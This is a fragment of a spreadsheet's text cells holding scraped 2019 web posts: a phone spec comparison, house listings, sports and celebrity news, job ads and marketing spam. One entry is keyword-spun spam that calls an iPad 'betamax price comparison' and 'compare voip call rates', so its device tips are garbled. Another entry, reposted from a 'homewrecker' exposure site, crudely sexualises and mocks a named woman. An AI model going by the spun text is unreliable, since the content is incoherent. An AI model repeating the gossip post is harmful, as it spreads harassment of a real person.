shows HDR+ updates in real time rather than after taking the photo, controls for adjusting exposure in separate parts of the photo, and improved Night Sight performance than can capture images of a starry night sky. Apple is also launching a feature called Deep Fusion for its newest iPhones, which processes photos at the pixel level to reduce noise and amplify detail. Apple’s Phil Schiller described the feature as “computational photography mad science” during the company’s iPhone unveil last month. Read more: Apple’s iPhone 11 launch is proof that the smartphone industry is going through a massive change Display and size Both Apple and Google offer their new smartphones in difference screen sizes, but Apple offers slightly more variety. Apple’s new iPhones come in three different sizes: the 5.8-inch iPhone 11 Pro, the 6.1-inch iPhone 11, and the 6.5-inch iPhone 11 Pro Max. Google’s Pixel 4, by comparison, comes in two sizes: the 5.7-inch Pixel 4, and the 6.3-inch Pixel 4 XL. Both of Google’s phones, however, feature an OLED screen, while Apple’s less expensive iPhone 11 comes with an LCD display. OLED screens are capable of displaying deeper, truer blacks and better contrast than LCD panels. Apple’s Pro-model iPhones claim to offer a higher contrast ratio than Google’s however. The iPhone 11 Pro and 11 Pro Max have a contrast ratio of two million to one, while the Pixel 4 and Pixel 4 XL’s is 100,000 to one. The iPhone 11 has the lowest contrast ratio of 1,400 to one. Google has made improvements elsewhere too: the new Pixel phones have a higher refresh rate of 90Hz, which should make scrolling and navigating the phone’s user interface feel smoother and snappier. Facial recognition Both Apple and Google allow you to unlock your phone just by looking at it, but with the Pixel 4, the search giant is claiming that it offers the fastest face unlock ever on a smartphone. That’s because it leverages Google’s Soli technology, which the company says can start the process of unlocking your phone as you reach for it since it uses radar to sense its surroundings. But Google’s Motion Sense tech will be capable of doing more than just helping you unlock your phone faster. During the event, Google showcased how it will let you do things like lowering the volume of your alarm as you reach for your phone and skip a song just by waving your hand. Apple also said it made improvements to Face ID with its newest iPhones that enable it to work up to 30% faster and perform better at various angles and distances. But it doesn’t support touchless gestures like the new Pixel does. Neither phones include a fingerprint sensor. Design and color options Apple and Google have also taken noticeably different approaches to design when it comes to their respective smartphones. You’ll notice the iPhone 11, 11 Pro, and 11 Pro Max have the familiar notch cutout near the top of the screen for housing the phone’s facial-recognition sensors and front-facing camera. The Pixel 4, comparatively, has what resembles a more traditional phone bezel near the top of its screen, which is where its selfie camera and Motion Sense sensors are located. That marks a departure from the Pixel 3’s design, which had a camera cutout that was deeper than it was wide in the top center of the display. Apple offers more variety when it comes to color options as well. The iPhone 11 is available in purple, yellow, black, green, white, and red, while the Pro models come in midnight green, space gray, silver, and gold. Google’s Pixel 4 is available in black, white, and orange. Storage and pricing It’s impossible to get a sense of which phone offers a better value without having spent more time using Google’s new Pixel. But here’s a look at how the pricing and storage options compare: Apple iPhone 11: $700 for 64GB of storage, $750 for 128GB, and $850 for 256GB iPhone 11 Pro: $1,000 for 64GB of storage, $1,150 for 256GB, and $1,350 for 512GB iPhone 11 Pro Max: $1,100 for 64GB of storage, $1,250 for 256GB, and $1,450 for 512GB Google Pixel 4: $800 for 64GB of storage, $900 for 128GB Pixel 4 XL: $900 for 64GB, $1,000 for 128GB Source: http://feedproxy.google.com/~r/typepad/alleyinsider/silicon_alley_insider/~3/vAPV1vionBc/google-pixel-4-vs-apple-iphone-11-pro-specs-camera-2019-10 The post Google just laid out its vision for the future of the smartphone with its new Pixel 4 — here’s how it compares to the iPhone 11 and 11 Pro (GOOGL, GOOG, AAPL) appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>Richmond, Maine | $225,000 An 1870s extended cottage with four bedrooms and three bathrooms, on 0.37 acres with river views The owner of this mid-coast Maine Victorian is a founder of the Maine Maritime Museum in the city of Bath. The house is less than a block from the Kennebec River, with views to Swan’s Island, a wildlife management area that is a five-minute ferry ride from shore. A market, a coffee shop, a library, a post office and a Russian Orthodox church, serving a community that immigrated from the Soviet Union starting in the mid 20th century, are all within walking distance. The larger cities of Augusta, Lewiston and Portland are 17, 24 and 42 miles away. Size: 2,672 square feet Price per square foot: $84 Indoors: The lower floor is built around a center hall with twin front parlors, each with maple floors, a bay window and an original tin ceiling. The dining room runs behind the staircase and connects to a room with a free-standing wet bar (this space is currently decorated with vintage posters supporting Prohibition). Another door leads to the kitchen, which has maple cabinets, tile floors, stainless-steel appliances and a pantry. A short hallway separates the kitchen from a large family room in a two-story addition. It has an electric fireplace and a full bathroom. Three bedrooms are on the second floor, along with a bathroom with a jetted tub and a laundry room. There is also an office that looks out over the rear deck and river. Outdoor space: A side porch is off the kitchen, and the rear deck extends from the family room. A one-car garage is on the addition’s lower level, with a carport next to it. Taxes: $3,252 (2018) Contact: Rick Bisson, Bisson Real Estate, Keller Williams Realty, 207-317-0366; my.flexmls.com Norfolk, Va. | $235,000 A studio loft with one bathroom in a circa 1900 converted industrial building This is the first-floor unit in a condominium building that at one point was a warehouse for Hofheimer’s, a now-defunct shoe company. It is in the waterfront Freemason neighborhood, just west of the central business district, known for its cobblestone streets, mature trees and historic residential and industrial architecture. Size: 919 square feet Price per square foot: $256 Indoors: The building’s main entrance opens to an atrium wrapped by a staircase and flooded with light. Plants supplied by residents thrive there. The unit is a long rectangle with hardwood floors and exposed ceiling beams and metal ducts. In the center of the room is a free-standing walk-in closet that is mirrored on one side. The mirror reflects the L-shaped open kitchen, which is built along one wall with wood cabinets and granite countertops. A washer and dryer and a mechanicals room are behind a pair of louvered doors next to the kitchen. Beyond that is the custom-designed bathroom, with walls faced in subway tile and a walk-in shower with an integrated corner bench. The bedroom area is on the opposite side of the central closet. Outdoor space: The unit comes with one deeded space in a parking lot. It is across the street from an Asian-inspired waterfront public garden with a two-story Taiwanese pagoda. Taxes: $2,508, plus a $340 monthly homeowner’s fee Contact: Benjamin Canty, Garrett Realty Partners, 703-939-7816; properties.hamptonroads.com Fairmont, W.Va. | $212,000 A 1927 Tudor Revival house with four bedrooms and two bathrooms, on two acres Built on the southeast outskirts of Fairmont — an old coal-mining city (population 18,400) that is experiencing a revival, with a new park and improvements to the business district — this brick-and-stucco house with half-timber detail has superior materials and construction. (The brick is from the celebrated Hammond factory that once existed nearby; the foundation is structural terra cotta.) It is 18 miles southwest of Morgantown, the home of West Virginia University. Size: 2,270 square feet Price per square foot: $93 Indoors: A number of upgrades, including a bathroom addition to create a master suite, were the work of the owner, an accomplished artisan. The front door takes you into a large foyer, now used for dining. To the right is a living room with a white-painted brick fireplace. (There is also direct access from a side door.) The kitchen, which is brightened by the original casement windows with vintage hardware, is to the left. Two bedrooms, including the large master, are on the main level. The new master bathroom has granite surfaces. The original exterior windows, backed with burlap curtains, remain above the hand-carved sink with its industrial copper faucet. The second floor has two additional bedrooms, as well as a room without a closet that is used as an office. The upstairs bathroom has a wall of split, polished lumber and a walk-in concrete shower with a rain shower head. The unfinished basement includes a washer and dryer. Outdoor space: Most of the two-acre property stretches behind the house and has grassy and wooded areas. Parking is available to the side and in the back. Taxes: $1,381 Contact: Heather M. Neill, Heritage Real Estate Company, 304-612-3746; wvheritagerealestate.com For weekly email updates on residential real estate news, sign up here. Follow us on Twitter: @nytrealestate. Source link</t>
  </si>
  <si>
    <t>Joe Johnson working to prove Big3 is path back to NBA roster Original Source When Joe Johnson signed with the Detroit Pistons, the headline everywhere seemed a variation of “The Big3 Is A Path Back To The NBA.” Except Joe Johnson is not on an NBA roster yet — the contract he signed with the Pistons was only partially guaranteed. Meaning they can cut him at any point without too much pain. Johnson and Christian Wood are the guys considered to be battling for the final roster spot (Wood is on a non-guaranteed contract as well, although reportedly with a smaller guarantee). Johnson, however, understands he is carrying the hope of a lot of Big3 players on his shoulders, and he takes that seriously, as he told Eric Woodyard of ESPN. “That was another reason why I thought it was very important for me to take this opportunity, because those guys in the Big3, a lot of them anyway, have hopes to at some point to be able to get back in the league,” Johnson said. “So I just wanted to let everyone know that it’s possible just to get to this point. I mean, I’m not even all the way on the roster, but to get to this point, get your foot in the door. Then whatever you do from that point, it’s up to you.” Johnson reportedly has been in good shape and performed well early in camp, but we’re weeks away from decisions being made. Whether he makes the roster or not may come down to what the Piston coaches and front office prioritize. Johnson can provide depth at the three behind Tony Snell, and maybe a little stretch four at points, plus is a pro in the locker room. Johnson is a “we want to win more games now” kind of choice. Wood, at 24, is 14 years younger, is more athletic, and at this point has more upside, but he is a project. If Johnson can make the Pistons’ roster the Big3’s pitch to guys such as Jamal Crawford or Corey Brewer (or even Carmelo Anthony) is “we can be your path back to the NBA.” Just getting into training camp provides some of that. Roster battles are rare in an NBA of guaranteed contracts, but Johnson’s fight for a roster spot is worth watching.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Joe Johnson working to prove Big3 is path back to NBA roster appeared first on Sky-News. Source link</t>
  </si>
  <si>
    <t>Timna Jacks</t>
  </si>
  <si>
    <t>The Morrison government is ramping up pressure on Premier Daniel Andrews to sign up to a $15 billion airport rail tunnel, but the Victorian government is still weighing up its options.</t>
  </si>
  <si>
    <t>Roanoke Virginia Credit Repair | (888) 630-5917 Roanoke Virginia Free Credit Repair Counseling call (888) 630-5917 remove bankruptcy, free consumer report, fix bad credit, check your annual Equifax, TransUnion, Experian credit report. Personal finance course guides Miller studentsCORNING — Students at Miller High School in Corning... Saturday 12 October 2019 05:25 AM UTC-05 Personal finance course guides Miller students CORNING — Students at Miller High School in Corning will have chance to learn life-long skills with a course focussing on financial issues. With the …</t>
  </si>
  <si>
    <t>NBA just digging a deeper hole. Via 6ABC: PHILADELPHIA (WPVI) — A fan was ejected from a Philadelphia 76ers preseason game against the Chinese squad Guangzhou Loong Lions on Tuesday night after holding signs and shouting support for Hong Kong. The incident came as the NBA finds itself connected to the ongoing protests in China. […]</t>
  </si>
  <si>
    <t>We are hiring for the spring of 2020. The position is full time, we are looking for someone long term. We are offing benefits after three months probation. Some sodding, grading, mulching, planting trees and bushes as well as various other general construction duties will vary. * Starting wage hourly ($17.00- $22.00 per hour, based .. Read more</t>
  </si>
  <si>
    <t>Joseph Lockwood</t>
  </si>
  <si>
    <t>Tourists boosted Lincolnshire’s economy by £1.58bn in 2018, a seven per cent increase on 2017, new figures have shown. The figures, published yesterday, revealed the</t>
  </si>
  <si>
    <t>Judiciary Chairman @JerryNadler claimed to have begun the impeachment inquiry weeks ago. Now, his own Judiciary members aren’t even allowed to participate in it. And yes – my constituents want me actively involved in stopping the #KangarooCourtCoup run by Shifty Schiff. https://t.co/vfWQfZmDi4 — Matt Gaetz (@mattgaetz) October 14, 2019 Unreal. So since there’s no GOP […]</t>
  </si>
  <si>
    <t>A mum claims her life is being made a “living hell” by drug users outside the home she shares with her family.</t>
  </si>
  <si>
    <t>Makur Maker has the opportunity to be a trailblazer if he wants. Source: Sports Business News</t>
  </si>
  <si>
    <t>What’s the best way to encourage innovation? The post What links Silicon Valley and tinned food? appeared first on NoPartySystem.Com.</t>
  </si>
  <si>
    <t>Saudi Aramco has delayed the planned launch of its initial public offering (IPO), the Financial Times reported on Thursday, citing three people familiar with the matter.</t>
  </si>
  <si>
    <t>● Follow our Drum &amp; Bass Playlist: http://ukf.io/DNBPlaylist ● Pre-save the EP and Download/Stream 'Sane': https://fanlink.to/Fade_Black_Sane Taken from Fade Black's Condemned EP, out 11th October via Critical Music. Fade Black Like → https://www.facebook.com/FadeBlackMusic/ Follow → https://twitter.com/fadeblackuk Listen → https://soundcloud.com/fadeblackuk Instagram → https://www.instagram.com/fadeblackuk/ Leo Law Like → https://www.facebook.com/leolawmusic/ Listen → https://soundcloud.com/leolawmusic Instagram → https://www.instagram.com/leoleolawlaw/ Critical Music […] The post Fade Black – Sane (ft. Leo Law) appeared first on Dubster.</t>
  </si>
  <si>
    <t>English Malay Hangman game – select either to guess the English or the Malay word from the head word in the other language. The word to guess is represented by a row of dashes, giving the number of letters. View the history of words used in the game and click on the list to show … Continue reading English Malay Hangman →</t>
  </si>
  <si>
    <t>Calvin Royal III takes on the lead role of George Balanchine’s “Apollo” at American Ballet Theater. Source link</t>
  </si>
  <si>
    <t>Hong Kong office workers and high-school students have turned out in their hundreds under a sweltering midday sun to denounce a policeman for shooting and wounding a teenager during the most violent clashes in nearly four months of unrest.</t>
  </si>
  <si>
    <t>Kylie and Travis reunited for a day at the Pumpkin Patch with Stormi Webster but NO they’re not back together…though they ARE living together…you heard that right, i havee the details coming up in a second. Stormi also proved that she totally has a preference for one parent over the other…at least when it comes to music. And Tyga posted a picture that shows he’s definitely paying attention to what Kylie’s up to…I have the details you don’t wanna miss.</t>
  </si>
  <si>
    <t>Penzance became the first town in Britain to receive “plastic free” status for its crackdown on single-use plastic. Fishermen collect litter at sea, schoolchildren march about climate change, and organic vegetables are grown to feed the homeless. Could this be the UK’s most eco-friendly town? Video Journalist: Patrick Clahane. This video is part of a special series from Penzance. BBC News is exploring the challenges and the opportunities for communities in Coastal Britain. Source link</t>
  </si>
  <si>
    <t>wakeboarding boat THUMBSUP! COMMENT! SUBSCRIBE! JB ONEILL doing a manual / tail press on his obrien format filmed Mitch Bergsma edit J.B. O’Neill jboneill gnarproductions.com gnarproductions gnar productions obrien wakeboards source The post SLOW MOTION Manual / Tail Press J.B. O'Neill Wakeboarding GNAR productions wakeboarding boat appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>Does anyone have any news on this Emily cheree chick. Some ig h0e getting naked in grocery stores for clout. Went from like 200 to 50k followers in a month just posting a55 and tits The post Emily Cheree – Attention Seeker? appeared first on Expose Homewreckers. The post Emily Cheree – Attention Seeker? appeared first on Cheater Xposed - Cheater Exposed USA.</t>
  </si>
  <si>
    <t>An betamax price, compare voip call rates can help you do a lot of different things. You have seen some uses, but there are also more advanced uses for it. From banking to gaming, all can be done on this tablet. Continue reading! You can access all apps that are running on your iPad. If you double-click on the Home button, it will show you all running apps in a bar on the bottom of your screen. You may switch to another running app, just by tapping that app in that bar. When you’re done, swipe the screen downwards to hide the bar. Is there anything more annoying than accidentally launching a seriously noisy app? To quickly mute the iPad’s volume, just hold down the volume button. If you mute often, you can set your lock orientation button as a tool to mute. It isn’t necessary to click the camera in the bottom to see the picture. Using your finger, swipe toward the right side, and you should see your video or picture. To view past pictures, swipe to the left. If you do not have much time, do not use your iPhone’s charger to charge your betamax price comparison. The two devices both operate at different wattages – the iPhone at 5 watts and the compare voip call rates at 10 watts. And their chargers follow suit. If you use that iPhone battery charger, it will be twice the time to charge. Use the original charger instead. If you’re worried about people trying to access your data, you can fix your iPad to erase your data if there are a certain number of failed attempts. This feature erases everything recorded on your phone after someone has tried and failed 10 times. It can be irritating hearing a chime every time you get an email on your betamax price comparison. The great thing is that you do not have to be. Start by going to Setting and General. Once you get there, select Sounds. You can shut off the new mail alert or reduce its level. Are you tired of going through the bookmark icon to visit your favorite sites? Within the iPad you can, simply by enabling the bookmarks bar. In Settings, open Safari and select the option to always show the bookmarks bar. Simply turn it on. Shortcuts are a great feature to install to save time and reduce stress. For instance, when you tap the space bar two times, you will get a period and a space. This automatic method will save you time so you can send your friends more messages. Screenshots are simple to take. Click both the Sleep and Home buttons and you will get a nice picture of your screen. The screenshot will be taken, and you can look at it from the photo area of your iPad. Betamax Price Comparison Muting your iPad quickly and easily is easy. All you need to do is to press and hold the button that decreases the iPad’s volume level. This is easier than having to keep readjusting the volume. Hold it again to return your iPad’s sound back to its previous level. It’s essential that you know how to treat your compare voip call rates. Firstly, you must keep the betamax price comparison away from the sun, and make sure it’s not locked in your car when it’s hot. The battery life can be cut short by exposure to heat. Also, keep your compare voip call rates away from liquids. Buy a type of padded cover to add protection to the betamax price comparison. When you want to copy and then paste text, tap it and click Select. Tapping on the text, switch to an app, and hold it down again. You can then paste. If you have a significant amount of sentences to copy, you may have to tap multiple times. With the tips in the above article in mind, you know how to properly use the compare voip call rates; begin doing so now. As you find out more about your betamax price comparison, you can learn all of its functions. It is a very handy device that you will be happy to have around. Are you on the Internet nearly all the time? Then take advantage of the iPad’s cloud functions. In this way, you can store information and save iPad hard drive space. You can store your important documents both on your device and on the cloud. Now that you know all about betamax voip, you will know what to do next. An extensive knowledge on the subject of betamax voip can come in quite handy. Learn from all the advice shared here. Keep these tips in mind when you need advice in the future about betamax voip.</t>
  </si>
  <si>
    <t>Good day! My name is Kristine A. Montemayor, A filipino citizen currently working in hongkong as a Domestic Helper. I am a family oriented type of person looking for an employer possibly by June 2020 as my contract here in hongkong will end by May 2020. Hope to find a good employer who also dedicated .. Read more</t>
  </si>
  <si>
    <t>The alarm was raised when one of the family members went into a nearby bar looking scruffy and bewildered and ordered five beers.</t>
  </si>
  <si>
    <t>This isn’t hard, U.S. has often had a requirement that immigrants not come in and be a burden on society. Via Daily Caller: The Trump administration will require many future immigrant applicants to prove they can afford health insurance, marking the White House’s latest move to restrict immigration from those who could become a financial […]</t>
  </si>
  <si>
    <t>Writer/director Phil Cox’s film was a visually stunning labour of love, writes Jeff Robson The post Betty Davis: Godmother of Funk, BBC4, review: Fascinating portrait of a lost voice from a golden era appeared first on 24plusnews.co.uk.</t>
  </si>
  <si>
    <t>AT 21 months old, Rein Boag can't quite understand what's happening when she eats her sterile ham sandwich and a catheter drips drugs into her jugular.</t>
  </si>
  <si>
    <t>The Sydney market is undergoing a shift in landlord behaviour as they become further in tune with what successful start-ups want.</t>
  </si>
  <si>
    <t>Lizard Spock</t>
  </si>
  <si>
    <t>Free for 7 days. Rated 4.6/5 on Google Play. Download Size of 6.1MB. I know nothing about Java or Java script, so if there are any members that would like to educate me on this programming code, please free to confuse me. Java-Learn with Animation [ Java Programming App pro : Learn Java / Java Tutorial ] app provides you : Java Compiler will Compile your Code at the fastest Speed Compiler can also Compile C,C++ Code along with Java Programs Java Animation Videos Which helps Students to ( Learn Java ) clear their concepts . This Java Programming pro version is Also Compatible with Tablets [Compatible Java Programming App for Tablets] 16 Lessons [107 topics With Pictures and Example Programs] Contains: Java Tutorial Offline</t>
  </si>
  <si>
    <t>Ipsos' Canadian Political Atlas showed what Canadians on Twitter thought of the debate — and they liked Jagmeet Singh, says Gregory Jack of Ipsos.</t>
  </si>
  <si>
    <t>Samsung has officially announced that it will collaborate with the Finably fintech firm, a Ripple’s partner, to launch an international money transfer service on the Samsung Pay app targeting US users. Samsung Electronics America has officially announced that it will collaborate with the fintech firm, Finablr. The partnership aims to launch an international money transfer service that will operate through the Samsung Pay app. The service currently targets US users and Finablr’s subsidiary Travelex powers it. Official information shows that Finablr is a listed partner of Ripple in London. Nonetheless, this deal with Samsung has no involvement from Ripple or XRP. An official announcement reveals that the new service will combine Samsung Pay’s convenience, security, and scale with Finablr’s international network and over 40 years of cross-border payment know-how. The service enables U.S. Samsung Pay users to transact to 47 countries using their credit or debit cards linked to the app. A Finablr spokesperson said: “The new in-app cross-border money transfer service, powered by Finablr Company Travelex, does not involve Ripple or XRP solutions.” The spokesperson also added that the deal leverages Finablr’s technology and global network to offer the service efficiently to the Samsung Pay users. The vice president and division head of content and services at Samsung Electronics America, Sang W.Ahn, also commented. He said that Samsung is happy that it will have the capability to let users send money from the US to the rest of the world in a simple, secure, and transparent manner. Sang affirmed that this new feature is the first step to the company’s vision of evolving Samsung Pay to make users’ financial livelihoods more convenient. He added that: “Our consumers are global and have friends and family around the world. Money Transfer is the first step in our vision to evolve Samsung Pay into a platform that makes users’ financial lives more convenient.” Finablr said that this service will expand to several other countries in 2020. Unimoni and UAE Exchange, the fintech firm’s other two subsidiaries, have been using RippleNet which is Ripple’s blockchain-based payments network. The network comes in handy in the cross-border remittances to Thailand since February 2019. Promoth Manghat, Finablr’s CEO said that they are happy to partner with Samsung in the launch of the new in-app cross border payment capability. He also added that this service demonstrates the ability to drive payments innovation underpinned by the Finablr technology platform. Notably, Samsung has been rapidly developing blockchain for its devices. In September, the company released the Galaxy Note 10 with an in-built cryptocurrency wallet. It also added bitcoin support to some of its phones in August 2019. Moreover, it has discussed developing its local blockchain network and its coin in the future. Currently, it is still unclear if Travelex will be using Ripple for any Samsung Pay transactions. The company plans to use the traditional SWIFT network for some of the transactions. This deal suggests that Samsung now commits itself to investing in increased use of financial cryptography and decentralized systems on their devices. However, it is not possible to use the service to buy and sell cryptos.</t>
  </si>
  <si>
    <t>Welcome to LocalAdz, your complete online marketing guidance company. We specialize in Premium WordPress Website Design, Mobile Website Design and are Search Engine Management professionals. Whatever you want to be well known for on the internet, we can make you a VISIBLE professional in your geographic area. Shop in Letohatchee AL. We use cutting edge methods for your keywords that are PROVEN and EFFECTIVE at increasing YOUR position in the search engines! We are a complete custom Premium Website Design, SEM Letohatchee and Internet Marketing firm. We can meet all of your Custom Web Design and Search Engine Management needs. We are experienced Web designers and search engine managers using the latest technology and online marketing techniques. We use the latest Web standards to meet your goals and expectations. We create websites and mobile websites that function across all browsers and mobile devices and load in the blink of an eye. Affordable Custom Website Design in Letohatchee AL | Web Design and Marketing Solutions Firm We utilize W3C compliant, search engine friendly code in all of our projects. We bring a user-centric philosophy and process to each and every decision, with our experience in usability and design. In short we do more than just design websites that are “pretty”. We design websites that help convert visitors into clients! We want to make Internet Marketing an accessible and successful addition to any marketing plan. We are a leading Internet Marketing and Search Engine Management Letohatchee AL Specialists. We can help drive more unique visitors to your website and convert them to buyers. We have been designing Websites and providing SEM since 2009; there have been MANY changes over these last few years. As technology has improved so has the web. It is more important than ever to keep up with the industry standards and what Google expects to see in web design. Because the best website on the planet will do you no good if people cannot find it. Good SEM and quality Web Design go hand in hand if you truly want to dominate your competition. Let LocalAdz help. We are not only one of the best SEM Companies in Letohatchee, we also offer top notch web design and development. Whether you need just a simple informational HTML website, or a custom built database, or anything in between we got it covered. Shop for Web Design Services in Letohatchee AL. More Letohatchee AL Information Letohatchee Alabama Weather Nearby Locations Website Builders in Nassau DE Originally Posted on November 2, 2010 and reposted on January 6, 2019"&gt;Website Development in Scammon Bay AKOriginally Posted on November 2, 2010 and reposted on January 6, 2019 Web Designer in New Hudson MI Web Design Services in Duquesne PA Web Design Portfolio in Menlo WA Website Design Company in Risco MO Web Developers in Friars Point MS Website Designers in Trinity Center CA Website Developer in New Stuyahok AK Web Design Services in Westlake LA Letohatchee Alabama Map Republished by Blog Post Promoter The post Web Design Services in Letohatchee ALOriginally Posted on July 14, 2016 and reposted on October 6, 2019 appeared first on Free Consultation (702) 518-6567.</t>
  </si>
  <si>
    <t>Source: https://www.techspot.com/news/82316-uber-moves-acquire-grocery-delivery-service-cornershop.html Uber moves to acquire grocery delivery service Cornershop Uber has never been content with being a mere ride-hailing service — that’s why the company upgraded its app into an “OS for everyday life” last month, while also running several other services that are well outside the scope of traditional ride-sharing platforms. For example, Uber offers restaurant delivery in… Source: https://www.techspot.com/news/82316-uber-moves-acquire-grocery-delivery-service-cornershop.html The post Uber moves to acquire grocery delivery service Cornershop appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>Vanessa</t>
  </si>
  <si>
    <t>Last evening’s doodling. Not sure how much will get done once the puppy arrives on Friday.</t>
  </si>
  <si>
    <t>Amy Childs shows off two stone weight loss in her underwear after training every morning – The Scottish Sun – Laskafitness AMY Childs has shown off her incredible two stone weight loss in a revealing photo. The ex-Towie star stripped off to reveal her slimmer stomach in a crop top on Instagram. 4 Amy treated fans to another shot showing off her flat tum after two childrenCredit: Instagram Amy, 29, looked incredible as she showed off her newly trim figure on social media after launching her daily exercise program mum.fit. She wrote in the caption: “Feeling myself. #sorrynotsorry.” Still can’t believe how far I have come, nearly 2 stone down training every morning doing “MUM FIT” …. if you want to lose weight and get back in shape then mum fit is for you.” Just days before she urged fans who were worrying about their weight not to give up. 4 Amy Childs wowed fans with her stunning two stone weight loss as she stripped to her underwearCredit: Instagram She wrote: “Sometimes you’ve gotta take a look back to see how far you’ve come! “ “I can honestly say that I’ve really enjoyed the journey too. Fitting in my workouts hasn’t always been easy but I’ve literally loved them all cos they make me feel so positive and creating mum. I know is helping so many other people do the same.” Amy ended her messaged about weight loss with: “Mums…we’ve got this! #postnatal #postnatalfitness #fitmum #happymum.” Many of her followers thanked her for inspiring them with the candid post as one said: “I need to do this had my 4th and can’t seem to find the time or energy to get going u look amazing.” View this post on Instagram A dream doesn’t become reality through magic, it takes sweat , determination and hard work …. Mums I have been reading all of your messages on my social media, your lovely comments, thank you….. I feel overwhelmed with your messages Remember it took me 6 months losing my baby weight, there was no rush losing my baby weight , just consistency, doing my “MUM FIT” everyday indoors around the kids it wasn’t a quick fix , it was determination and seeing results after a few weeks so mums my link is in bio, if I can do it you can all do it, just put your mind to it Also sorry about the overload of bikini selfies sorry not sorry ….. Bikini @bikinikinini A post shared by Amy Childs (@amychilds1990) on Sep 26, 2019 at 12:56pm PDT 4 Amy before her weight lossCredit: @amychilds1990/ Instagram 4 Amy, pictured before her weight loss, rose to fame on TowieCredit: Getty – Contributor ‘GO IN PEACE’ Martin Compston responds to anti-Catholic ‘bead rattling p***k’ troll abuse DISBE-LEAF Phil Schofield brands Jamie Oliver a ‘filthy pervert’ for putting salad in pasty NO YOKE Limmy explains ‘Yoker’ Joker poster to Thandie Newton as she ‘doesn’t understand’ SHAMEFUL Martin Compston hits back at MORE anti-Catholic abuse as he’s branded ‘tarrier’ KYLIE UNUSUAL Kylie Jenner bodyshamed over her ‘abnormal’ curves by cruel trolls SOCKS APPEAL Love Island’s Adam Collard accused of stuffing pants as he reveals huge bulge Another wrote: “Well done huni you have motivated me to loose this baby weight ! Xx.” Amy has shared a number of bikini photos as she persuaded people not to rush into “quick fix diets”. She captioned one post: “Remember it took me 6 months losing my baby weight, there was no rush losing my baby weight , just consistency, doing my “MUM FIT” everyday indoors around the kids it wasn’t a quick fix , it was determination and seeing results after a few weeks so mums my link is in bio. Amy left Towie in 2011 and is one of the show’s highest earners. She’s allegedly worth a cool £5million from her beauty salon in Brentwood, Essex, which brought vajazzles to the public’s attention. She now has a successful baby range including prams and baby furniture. Amy gave birth to her first child, Polly, with Bradley Wright at the end of April 2017 and her second in early 2019. She revealed she was single after splitting from Ritchie, the father of her second child last summer. Amy Childs gives Sam Faiers a vajazzle on Towie Got a story? email digishowbiz@the-sun.co.uk or call us direct on 02077824220. We pay for videos too. Click here to upload yours. !function(f,b,e,v,n,t,s)if(f.fbq)return;n=f.fbq=function()n.callMethod? n.callMethod.apply(n,arguments):n.queue.push(arguments);if(!f._fbq)f._fbq=n; n.push=n;n.loaded=!0;n.version=’2.0′;n.queue=[];t=b.createElement(e);t.async=!0; t.src=v;s=b.getElementsByTagName(e)[0];s.parentNode.insertBefore(t,s)(window, document,’script’,’https://connect.facebook.net/en_US/fbevents.js’); fbq(‘init’, ‘752905198150451’); fbq(‘track’, “PageView”); Original Source Follow Laskafitness on Instagram The post Amy Childs shows off two stone weight loss in her underwear after training every morning – The Scottish Sun – Laskafitness appeared first on Sky-News. Follow us on our social networks Posted on Bible Of Sport Bible Of Sport - Instagram Bible Of Sport - Twitter Bible Of Sport - Facebook Source link</t>
  </si>
  <si>
    <t>The volatility in the Australian economy has left many people scratching their heads on how to reap decent returns on their hard-earned cash.</t>
  </si>
  <si>
    <t>‘Superb human being’ – These Saints fans praise club icon who ‘lived the absolute dream’ Original Source There are some players at football clubs that transcend the icon status and belong in a category of respect and love very few names will ever reach, but for Francis Benali, the former Southampton star is placed firmly here. Reaching the FA Cup final Playing with @mattletiss7 Man-marking @IanWright0 @FrannyBenali recalls his best (and worst) #SaintsFC memories: — Southampton FC (@SouthamptonFC) October 9, 2019 The now 50-year-old Saints hero has kept a strong affinity to the club the defender spent over 16 years at, with Benali part of the Southampton side that made it to the 2003 FA Cup final and forever making himself as a legend of the club for his work off the pitch, with the former defender raising £1 million this year for Cancer Research UK as reported by BBC News. The former left-back is a true Southampton legend, and Benali has backed up his love for the Saints in a recent interview with the club’s official website where the south coast-born defender discussed the highest of highs and lowest of lows during his time with the no Premier League club. With Benali holding a special place in the hearts of Southampton fans everywhere, plenty of supporters on social media flocked to praise their Saints legend for his words about the team and what it means to play for the club he loved. Here’s what some Southampton fans had to say about Benali’s raving praise of Southampton… A great bloke – a superb human being — Mike (@Mikecuell) October 9, 2019 And you got to score — Graham Giles-Payne Esq (@ggilespayne) October 10, 2019 Great snapshot insight. — Mark Smith (@smudger1703) October 10, 2019 Mush it was an absolute pleasure (must of the time) watching you play, some of the tackles you made were out of this world, or should I say put the opposition out of this world. #OneTrueSaint #SaintsFC — Saints Mike (@Saints_Mike7167) October 10, 2019 Benali has a place in the hearts of Saints fans everywhere… We often sing “he’s one of our own”, well @FrannyBenali is one of our own, in fact he’s the best of our own. A proper mush and an incredible person who does the most incredibly selfless acts.#ariseSirFranny #saintsfc https://t.co/04qLseXSU2 — @TheCommittee (@TheCommittee7) October 10, 2019 Sir Franny please! — trautsneerg (@trautsneerg) October 10, 2019 All the best Fran — Neil Taylor (@neiltay70524924) October 10, 2019 Two of the very best to wear the badge Fran #SaintsFC pic.twitter.com/ODHCsLoiGH — Robbie (@EditSouthampton) October 10, 2019 Benali will be hoping Southampton return to good form following the international break, with the Saints currently sat in 17th place in the Premier League table.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‘Superb human being’ – These Saints fans praise club icon who ‘lived the absolute dream’ appeared first on Premier League. Follow us on our social networks Posted on Bible Of Sport Bible Of Sport - Instagram Bible Of Sport - Twitter Bible Of Sport - Facebook Source link</t>
  </si>
  <si>
    <t>UmartBuddy</t>
  </si>
  <si>
    <t>Audio Technica ATH-DSR5BT Wireless Bluetooth in-Ear Headphones $199 + Shipping (Free in-Store Pick up is available) at Umart. Hurry ends Tuesday, 22 Oct 2019. The ATH-DSR5BT wireless headphones are the first in-ear model to employ Audio-Technica’s Pure Digital Drive system, which utilizes a newly developed A-T chipset to control driver amplitude directly with digital signals so no sound-degrading digital-to-audio conversion is required. Additionally, the ATH-DSR5BT headphones support the Qualcomm® aptX™ HD codec to receive 24-bit/48kHz audio signals, and they feature highly efficient dual phase push-pull drivers of different diameters (9.8 mm + 8.8 mm) to ensure crystal-clear sound reproduction. Learn more here</t>
  </si>
  <si>
